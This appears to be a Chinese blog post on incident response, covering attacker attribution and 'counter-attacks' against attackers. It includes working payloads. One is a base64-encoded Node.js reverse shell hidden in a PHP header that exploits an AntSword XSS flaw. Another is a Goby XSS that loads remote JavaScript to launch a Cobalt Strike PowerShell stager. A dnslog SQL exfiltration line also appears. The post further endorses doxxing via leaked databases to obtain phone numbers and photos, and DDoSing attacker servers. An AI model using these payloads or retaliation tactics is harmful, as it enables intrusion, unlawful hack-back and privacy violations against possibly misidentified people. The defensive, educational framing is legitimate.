应急响应—溯源反制

admin 2024年2月15日18:38:50评论19 views字数 7783阅读25分56秒阅读模式

0.前言

由于都是发自己的文章,所以也不会有那么多的内容发布,一周可能也就更新个两篇,如果工作忙,可能一周就一篇,但是文章都会很细致,暂时只更新学习笔记,至于挖洞思路,小菜鸟还不配。

0.1.免责声明

传播、利用本公众号剁椒鱼头没剁椒所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号剁椒鱼头没剁椒及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

0.2.其它

部分文章由于之前授权给其它公众号发布,所以有些并未加入相关的系列中,还请到历史文章中查看,尤其是提取方面的文章。

由于不少朋友和我说使用 CSDN 看文章不方便,有时候设置粉丝阅读后还需要登陆账户,所以这里我准备了一个公众号,会陆续将文章同步过来,期间可能也会发一些其它内容。

文章内容太多不适合使用手机观看,手机只适合用来点赞 😀

内容同步于 CSDN:剁椒鱼头没剁椒

内容同步于 Github:https://github.com/djytmdj/Network-security-study-notes

1. 攻击后溯源

所谓被攻击后溯源,意思就是网站已经被攻击者攻击了,而我们需要的是利用攻击者遗留下来的木马文件、访问日志、防火墙日志、态势感知日志等信息去获取相关的资料,在对其资料中可用的内容进行分析溯源。

应急响应—溯源反制
21-1

1.1. IP 地址

关于 IP 地址,是攻击者最容易被遗留下来的数据,类似 IP 地址可能会遗留在中间件的日志中、Windows 中 RDP 远程连接日志、Linux 中 SSH 远程连接依旧防火墙或态势感知中攻击行为 IP 地址,都可能会遗留下来。

1.1.1. IP 地址定位

这里我用防火墙捕获到的 IP 地址做测试,这个 IP 地址好像是某个视频厂商来远程调试,导致误报出现的攻击,具体忘记了是某康还是某视的了。

https://www.opengps.cn/Data/IP/ipplus.aspx
https://chaipip.com/
https://www.ipplus360.com/
应急响应—溯源反制
image-20231106130732620

1.1.2. IP 地址分析

当然 IP 地址定位只是为了更好的找到攻击者的位置,但是,更多的时候只有说出现大问题的时候才会具体去找人,而攻击者基本上都会隐藏自己的 IP 地址。所以,IP 地址定位多数情况下用处不多。

更好的是将 IP 地址进行分析,例如是否存在域名等等,例如这里使用微步查看是否曾经有人给该 IP 打过标签,有没有备案过域名,如果使用的是云服务器,大概率可能会对其备案域名。

应急响应—溯源反制
image-20231106131211016

由于这里溯源反制比较麻烦,没有真实的 IP 地址,确实不好对其进行分析,又不能拿别人的博客地址或者什么的来进行分析,这样就是搞别人的隐私了。

1.2. 域名

这里就是依据上述获取到相关的域名才好对其进行分析,例如www.baidu.com完全可用去进行 whois 查询、备案查询、天眼查、fofa 查询等。

可以看一下,我之前注册的域名,并没有使用,也被我关了,可以看到公司那里,就是我的名字,到这里就基本上可能能获取到姓名了,但是需要注意的是,有很多情况下,攻击者基本上都是使用免实名制的域名,那就不好办了.....

如果注册公司直接显示的是某家公司,那就可以使用一些查公司的例如天眼查、企查查就可以找到注册人了,通常也就能够获取到手机号了。

应急响应—溯源反制
image-20231106132419521

1.3. 手机号/QQ

比如,你访问 IP 地址所属的域名,可以在域名网站中找一找,通常在网站中都会存在例如打赏、微信号、QQ 等,如果能够获取到 QQ 号更好,那么就可以根据 QQ 号在**库中反差。

由于在网站中获取到手机号基本上是不太可能的,而想要获取到手机号其实是比较麻烦的。而 QQ 号或微信号是最容易获取的,如果能够加上好友那最好。

拿到 qq 可以到你懂的的上面去搜,基本上也就能获取到相应的手机号,获取到手机号,那不基本上就是想怎么搞都可以了呀。

手机号:
支付宝、微信、微博等等,通过这些方式,可能能够获取到图片等等,还有可能获取到照片。
应急响应—溯源反制
image-20231106133111795

1.4. ID

ID 这个东西吧,有些人会习惯性的各大网站都会使用同一个 ID,那就可以直接百度搜索么,包括可以直接拿着 ID 去圈子里面问问,有没有人认识。

你看我这 ID,遍地都是......无语了,我要改名字了,当然在这个圈子里面,谁没被人家恶搞过.......

百度搜索、谷歌搜索、src搜索、微博搜索、微信ID搜索、豆瓣、贴吧、知乎等等。
应急响应—溯源反制
image-20231106134128294

1.5. 木马样本

木马样本中有可能也能够找到一些相关数据,例如我这里使用 cs 生成一个木马,当然啦,没做免杀,直接获取到木马的 IP 地址。

应急响应—溯源反制
image-20231106135316187

1.6. 总结

可能整体来说很简单,目前根据 IP 地址能够进行溯源的也就这些了,基本上都是看裤子来解决,不靠裤子,除非去加上微信去忽悠,否则获取手机号确实没那么容易。

当然如果你条件允许,你直接通过获取到的 IP 直接攻击他,直接拿下他服务器那什么获取不到.......

攻击画像大概模型:
姓名/ID:
攻击IP:
地理位置:
QQ:
IP地址所属公司:
IP地址关联域名:
邮箱:
手机号:
微信/微博/src/id证明:
人物照片:
跳板机(可选):
关联攻击事件:

2. 攻击中反制

攻击中反制,就是说攻击者暂未停止对其攻击,还处于攻击的阶段,这里就需要涉及到很多蓝队的知识了。

2.1. 定位准确

所谓的定位准确意思就是要准确的定位到被攻击的服务器、主机、人等。及时的登陆涉事主机上排查,例如依靠态势感知、服务器、蜜罐等设备获取到出现异常的主机 IP。

主要关注:RDP 日志、SSH 登陆日志、中间件日志、网络连接、进程、代理日志等这些来获取 IP 地址、跳板机 IP、木马文件等。

2.2. 反制手段

2.2.1. 钓鱼邮件反制

可以通过钓鱼邮件的附件进行逆向分析、查看源码等方式获取到 IP 地址,对 IP 地址进行渗透攻击,最简单的办法,拿不下就干趴它,直接对其进行 DDOS 攻击等,通常用于攻击的服务器如果是云服务器,均不会购买太好的配置。

2.2.2. 蚁剑反制

此漏洞在 AntSword2.7.1 版本上修复 ,所以适用于 AntSword2.7.1 以下版本。

此漏洞为 AntSword 连接 WebShell 失败时对 html 代码的解析,导致 xss 漏洞,而使 html 代码不在浏览器解析而是在服务器上解析的话需要用到 nodejs,所以 AntSword 使用了 nodejs,本文章就讲解利用 xss 漏洞执行并调用 nodejs 的库反弹 shell 拿到权限。

下载地址:
蚁剑:https://github.com/AntSwordProject/antSword/archive/refs/tags/2.0.7.zip
加载器:https://github.com/AntSwordProject/AntSword-Loader/archive/refs/tags/2.0.1.zip

这里我们随意搭建一个网站,让蚁剑连接上去就可以了。

应急响应—溯源反制
image-20231106144014183

2.2.2.1. 测试 XSS 漏洞

这里我们修改攻击者的木马,将木马中的内容修改成弹窗木马,修改后,攻击者再次连接木马后就会出现弹出“250”的窗口。到这里就可以证明是存在 xss 漏洞的。

<?php header("HTTP/1.1 500 <img src=1 onerror=alert(1) />") ?>
应急响应—溯源反制
image-20231106144233259

2.2.2.2. RCE 漏洞反弹 shell

这里我们就可以使用蚁剑的 RCE 漏洞反弹 shell 获取攻击者的主机。

首先这里我们使用 nc 监听 2200 端口,等待反弹 shell。

应急响应—溯源反制
image-20231106150146913

修改木马中的代码,修改为反弹 shell 的代码,利用 nodejs 库反弹 shell 的代码(payload):

var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(2200"192.168.10.10"function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

以上代码通过创建 Socket 来连接 192.168.10.30(被攻击的电脑 ip) 的 2200 端口(Netcat 监听的端口)

将以上代码进行 base64 加密,加密后的密文:

dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgyMjAwLCAiMTkyLjE2OC4xMC4xMCIsIGZ1bmN0aW9uKCl7Y2xpZW50LnBpcGUoc2guc3RkaW4pO3NoLnN0ZG91dC5waXBlKGNsaWVudCk7c2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs

并替换掉我们前边写的 alert(250)代码,最终写到 shell.php 中的代码如下:

<?PHP
 header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgyMjAwLCAiMTkyLjE2OC4xMC4xMCIsIGZ1bmN0aW9uKCl7Y2xpZW50LnBpcGUoc2guc3RkaW4pO3NoLnN0ZG91dC5waXBlKGNsaWVudCk7c2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs`,`base64`).toString())'>");
 ?>

反弹成功了,别问我这里为什么又变成 kali 了,因为我测试了半天一直不能反弹,结果发现是被杀毒软件拦截了.........

应急响应—溯源反制
image-20231106151742124

2.2.3. goby 反制

这里由于我这版本 goby 可能版本太高了,并未复现出来

制作一个钓鱼页面,也就是一个弹窗 XSS 页面,让其 goby 去扫描,然后等到扫描结束后,去资产中点击 IP 地址,就会出现弹窗。

<?php
 header("X-Powered-By: PHP/<img src=x οnerrοr=alert(/xxx/)>");
?>
应急响应—溯源反制
184445de2b3746538ca6a752f911e3e1

2.2.3.1. 修改 PHP 代码

这里将修改 php 代码,同时在创建一个 1.js 的代码。

php代码:
<?php
 header("X-Powered-By: PHP/<img src=1 οnerrοr=import(unescape('http%3A//192.168.0.105:9988/1.js'))>");
?>

弹计算机代码:

js代码:
(function(){
require('child_process').exec('calc.exe');
})();

上线代码(CS 的 powershell):

(function(){
require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');
})();
应急响应—溯源反制
def6a8a145be43988e67acf922cabde1

2.2.4. dnslog 反制

攻击方在对目标进行攻击的时候,有时候会遇到无回显的情况,那么就会使用结合 dnslong 的方式,这里能够将回显的内容带回,例如:

ping xx.dnslog.com
load_file(CONCAT('\',(select hex(table_name) from information_schema.tables where table_schema=database() limit 0,1),'.xx.dnslog.com'))

一般情况下在安全设备的日志中是能够看到 dnslong 的地址的,如果没有告警,那么就只能从相关的中间件日志中靠经验就搜集了,可以使用一些关键字来查看。

2.2.4.1. 反制方式

接下来,可以去网上找提供 PING 服务的网站。把上面提取出的攻击者的 dnslog 平台地址做为 ping 的目标地址,执行 ping 操作。如果攻击这用的是网络上找到 dnslog 平台,大多情况下 ping 出的地址都是 127.0.0.1,如果是自己搭建的 dnslog 平台,设置不规范的情况下会显示 vps 的 IP。

应急响应—溯源反制
image-20231106154418728

2.2.4.2. 查看效果

可以看到这边就会有很多的日志,那么这样就会一直占用,导致这个地址无法使用,当然如果是自己搭建的,那么就相当于这个平台废掉了,如果是公开的,很简单抓到一个 ping 一个。

你也可以在前面添加一些内容,恶搞他。

应急响应—溯源反制
image-20231107100707034

2.2.5. Cobaltstrike 反制

由于这里需要设置环境以及一些 java 编译,我环境不足,我就不演示了,我这边多给几个参考文章。

CVE-2022-39197 CS RCE 复现分析[1]

反制 Cobaltstrike 的那些手段[2]

最新 CS RCE 曲折的复现路

溯源反制思路整合总结[3]

HW 多人运动溯源及反制指北[4]

攻防演练中防守方的骚姿势[5]

2.3. 总结

在攻击中,其实更多的情况下应该是靠一些相关的安全设备来进行防护,你靠人为去发现,除非就一台主机一台服务器,你盯着看,否则的话,还是需要依靠相关的安全设备,同时攻击中多数还是需要根据业务的流量来判断究竟是属于什么类型的攻击,比如说服务器被下了木马,那么木马是怎么来的,是人为导致的还是服务器存在漏洞,所谓点鼠标的猴子,直接拉黑名单。

3. 攻击前反制

所谓攻击前反制,就是在还未开始被攻击前就应该做好相关的安全防护,例如资产是审查、安全设备安装、高危漏洞的检查、补丁更新等。

并且攻击前所做的和 hvv 前期的准备没什么区别,首先应当充分地了解自身安全防护状况与存在的不足,找出自身的脆弱点并及时进行加固,为后续工作提供能力支撑。这就是准备阶段的主要工作。

在日常中对未知资产排查、安全设备 0day 排查、系统漏洞排查、系统弱口令排查、系统配置缺陷排查、内网集权系统排查、协助安全加固等技术性工作。

直接参考下面的文章中的内容:

攻防演练合集 | 3 个阶段,4 大要点,蓝队防守全流程纲要解读[6]

参考资料

[1]

CVE-2022-39197 CS RCE 复现分析: http://www.bmth666.cn/2023/03/22/CVE-2022-39197-CS-RCE%E5%A4%8D%E7%8E%B0%E5%88%86%E6%9E%90/

[2]

反制 Cobaltstrike 的那些手段: https://forum.butian.net/share/1975

[3]

溯源反制思路整合总结: https://www.ddosi.org/suyuan/

[4]

HW 多人运动溯源及反制指北: https://xz.aliyun.com/t/10268#toc-7

[5]

攻防演练中防守方的骚姿势: https://www.anquanke.com/post/id/219059

[6]

攻防演练合集 | 3 个阶段,4 大要点,蓝队防守全流程纲要解读: https://www.anquanke.com/post/id/275234#:~:text=1%20%E4%BA%8B%E5%89%8D%E5%87%86%E5%A4%87%E5%B7%A5%E4%BD%9C%E2%80%94%E2%80%94%E8%B5%84%E4%BA%A7%E6%A2%B3%E7%90%86%E3%80%81%E8%84%86%E5%BC%B1%E6%80%A7%E8%AF%84%E4%BC%B0%E6%95%B4%E6%94%B9%E3%80%81%E6%BC%8F%E6%B4%9E%E6%97%A0%E6%95%88%E5%8C%96%E5%AE%9E%E6%96%BD%E3%80%81%E4%B8%9C%E8%A5%BF%E5%90%91%E6%B5%81%E9%87%8F%E6%8E%A7%E5%88%B6%EF%BC%9B%202,%E4%BA%8B%E4%B8%AD%E5%80%BC%E5%AE%88%E5%B7%A5%E4%BD%9C%E2%80%94%E2%80%94%E6%94%BB%E5%87%BB%E9%98%9F%E5%85%A5%E4%BE%B5%E7%9B%91%E6%8E%A7%E3%80%81%E6%94%BB%E5%87%BB%E5%91%8A%E8%AD%A6%E7%A0%94%E5%88%A4%E3%80%81%E6%94%BB%E5%87%BB%E4%BA%8B%E4%BB%B6%E8%B0%83%E6%9F%A5%E3%80%81%E5%86%85%E5%AD%98%E9%A9%AC%E6%94%BB%E5%87%BB%E7%9B%91%E6%8E%A7%E3%80%81%E6%96%87%E4%BB%B6%E5%AE%8C%E6%95%B4%E6%80%A7%E7%9B%91%E6%8E%A7%E3%80%810day%E6%94%BB%E5%87%BB%E4%B8%93%E9%A1%B9%E9%98%B2%E6%8A%A4%EF%BC%9B%203%20%E4%BA%8B%E5%90%8E%E6%BC%94%E7%BB%83%E5%90%8E%E7%BB%AD%E2%80%94%E2%80%94%E5%B9%B3%E6%88%98%E8%83%BD%E5%8A%9B%E7%A7%AF%E7%B4%AF%E4%B8%8E%E4%BC%A0%E9%80%92%E3%80%81%E8%90%BD%E5%9C%B0%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5%E6%A0%87%E5%87%86%E5%8C%96%E3%80%81%E8%87%AA%E5%8A%A8%E5%8C%96%E3%80%81%E5%AE%9E%E6%88%98%E5%8C%96%E3%80%82

原文始发于微信公众号(剁椒鱼头没剁椒):应急响应—溯源反制

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日18:38:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   应急响应—溯源反制http://cn-sec.com/archives/2187305.html

发表评论

匿名网友 填写信息